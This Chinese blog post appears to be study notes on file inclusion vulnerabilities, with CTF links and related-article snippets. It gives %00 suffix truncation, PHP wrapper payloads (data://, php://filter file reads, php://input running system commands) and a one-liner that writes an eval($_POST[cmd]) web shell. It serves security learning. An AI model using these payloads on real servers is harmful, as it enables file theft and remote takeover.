文件包含漏洞

最新推荐文章于 2021-07-21 21:48:31 发布
最新推荐文章于 2021-07-21 21:48:31 发布
阅读量135 收藏
点赞数
分类专栏: web漏洞 文章标签: web 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46085232/article/details/115318204
版权

文件包含漏洞

什么是文件包含

简单点说,就是写代码时,调用已有功能文件或者库的时候,就是文件包含。

常见的脚本文件包含代码:
ASP,PHP,JSP,ASPX等
<!–#include file=“1.asp” -->
<!–#include file=“top.aspx” -->
<c:import url=“http://thief.one/1.jsp”>
<jsp:include page=“head.jsp”/>
<%@ include file=“head.jsp”%>
<?php Include(‘test.php’)?>

漏洞原理

漏洞产生是因为文件包含能够将包含的文件进行脚本解析(不论后缀格式),用户输入过滤不严谨。
表现形式:http://www.xxx.com/include.php?filename=xxx.php

漏洞分类

远程文件包含

remote file include

本地文件包含

local file include
顾名思义包含本地的文件,所以需要通过上传或者其他方式上传含有后门代码的文件(txt,jpg等等)

漏洞知识点

绕过后缀(PHP低版本)

代码

<?php \$filename=\$_GET['filename']; include($filename.'.php'); ?>

这里可以采用%00截断,或者突破后缀名长度限制
远程包含时,%00,%23,?等

伪协议(高版本)

data://text/plain,<?php%20phpinfo();?>
data协议,要将allow_url_include设置为ON
文件读取:
php://filter/convert.base64-encode/resource=1.txt
file:///D:/phpstudy/PHPTutorial/WWW/1.txt
RCE执行:
php://input Post:<?php system('ver')?>

<?PHP fputs(fopen('s.php','w'),'<?php @eval($_POST[cmd])?>');?>

data://text/plain,<?php%20phpinfo();?>

漏洞拓展

  • ekucms包含日志getshell
    无法上传文件时,考虑系统,日志等文件
  • [ACTF2020 新生赛]Include
    https://buuoj.cn/challenges
    I春秋“百度杯”CTF比赛 2017 二月场 50 include
    https://www.ichunqiu.com/battalion?t=1&r=57475
把小海蒂的名字还给我(师从小迪渗透)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞3
qq_46085232的博客
07-08 103
SQL注入漏洞SQL注入sao姿势堆叠注入二次注入Dnslog注入高权限注入 SQL注入sao姿势 为什么我说是sao姿势,原因是这些sao姿势的存在一般都需要特定的条件,比如数据库的特性,当前数据库用户的权限,代码逻辑缺陷等等。 堆叠注入 在MYSQL数据库中,分号‘;’是用来表示一条sql语句的结束。也就是在分号后可以继续下一条sql语句。当然堆叠注入存在局限性,它取决于数据库类型是否支持多条语句执行,同时也受到了当前连接数据库用户的权限的制约。 当然,在现实情况下,由于代码执行后通常只会返回一个查询结
SSRF漏洞
qq_46085232的博客
07-13 91
SSRF漏洞漏洞原理漏洞的寻找漏洞测试漏洞防御总结 哎,因为面试老问这个问题,又因为自己对这个漏洞并不是很了解,所以,首先为了下次避免尴尬,其次也是加深web安全漏洞的理解。 漏洞原理 SSRF,服务器请求伪造。服务器端由于提供了从外部服务获取数据的功能,且没有对目标地址,协议等重要参数进行过滤和限制,从而攻击者通过构造数据进而伪造服务器端发起请求的漏洞漏洞的寻找 如果能很好的理解漏洞产生的原理,这个问题就很简单了 SSRF漏洞一般出现在服务器调用外部数据的场景中,如 1.社区服务分享功能 2.图片识别
我遇到的python问题-1
qq_46085232的博客
05-30 187
这里会是不是的记录,我在使用Python时遇到的问题。(今天又是熬夜的一天,应该算是通宵吧,都5.31了,应该是习惯了) requests库post方法,如何带上headers 因为这个我之前学习Python也遇到了这个问题,但是没去解决 解决方法: response = requests.post(url, data = body, headers = headers) 其中data对应的body 就是你的请求体,headers对应的headers就是你的请求头 requests.exceptions.S
文件包含漏洞(LFI、RFI)(require()、include()函数)
Hardworking666的博客
05-10 4607
文章目录一、文件包含漏洞二、文件包含函数二、文件包含漏洞实例“百度杯”CTF比赛 2017 二月场include 一、文件包含漏洞 文件包含漏洞,是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,在文件中,包含一个文件。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。 这意味着可以创建供所有网页引用的标准页眉或菜单文件。 当页眉需要更新时,只更新一个包含文件就可以了,或者当向网站添加一张新页面时,仅仅需要修改一..
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序中较为普遍。这种漏洞允许攻击者通过控制程序中用于指定要包含文件的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
php 伪造本地文件包含漏洞的代码
10-28
本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、漏洞原理分析 在上述示例代码中,...
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
信息安全技术:文件包含漏洞简介.pptx
11-01
本文将深入探讨文件包含漏洞的概念、风险以及如何识别和防范这类漏洞。 **1. 什么是文件包含?** 文件包含,通常指的是在编程中,尤其是PHP语言中,通过特定语句(如`include`或`require`)将一个外部文件的内容...
ctf 文件包含总结
njqfb的博客
06-04 1610
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行的代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
文件包含漏洞之PHP伪协议中的data://的那些事~
热门推荐
Firebasky的博客
06-10 1万+
最近在看文件包含漏洞中的PHP伪协议,发现其中的一个data://方法不能使用?但是自己确实把php.ini里面的allow_url_fopen和allow_url_include打开了。而且在web安全这本书里面也是一模一样的写法? 最后才发现了问题,原来是编码的问题。 实验: //include.php <?php @$file = $_GET['file']; @include($file); ?> 通过data://text/plain协议来进行漏洞利用。 ?file
WEB漏洞-文件操作之文件包含漏洞
Rnan_prince的博客
07-21 239
文件包含漏洞 原理,检测,类型,利用,修复等 文件包含各个脚本代码 ASP,PHP,JSP,ASPX等 <!--#include file="1.asp" --> <!--#include file="top.aspx" --> <c:import url="http://thief.one/1.jsp"> <jsp:include page="head.jsp"/> <%@ include file="head.jsp"%> ..
漏洞发现(工具篇)
qq_46085232的博客
06-27 711
漏洞发现-工具篇常用漏洞扫描工具XrayAWVSGobyvulmapburp使用方法XrayAWVSGoby工具联动Xray&Awvs&Burp联动 想必不管是小白,还是大佬,都听过,或者使用,甚至二次开发过漏扫工具,比如,xray,awvs,goby等等。这里将先介绍常用的工具,及其用法,在叙述,漏扫工具的“正确使用方法”。 常用漏洞扫描工具 Xray Xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简
i春秋CVE-2022-32991
08-12
我很抱歉,我无法回答你的问题。因为提供的引用内容与我可以回答的范围无关。请提供更明确的问题,我将尽力帮助你。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【春秋云境】CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值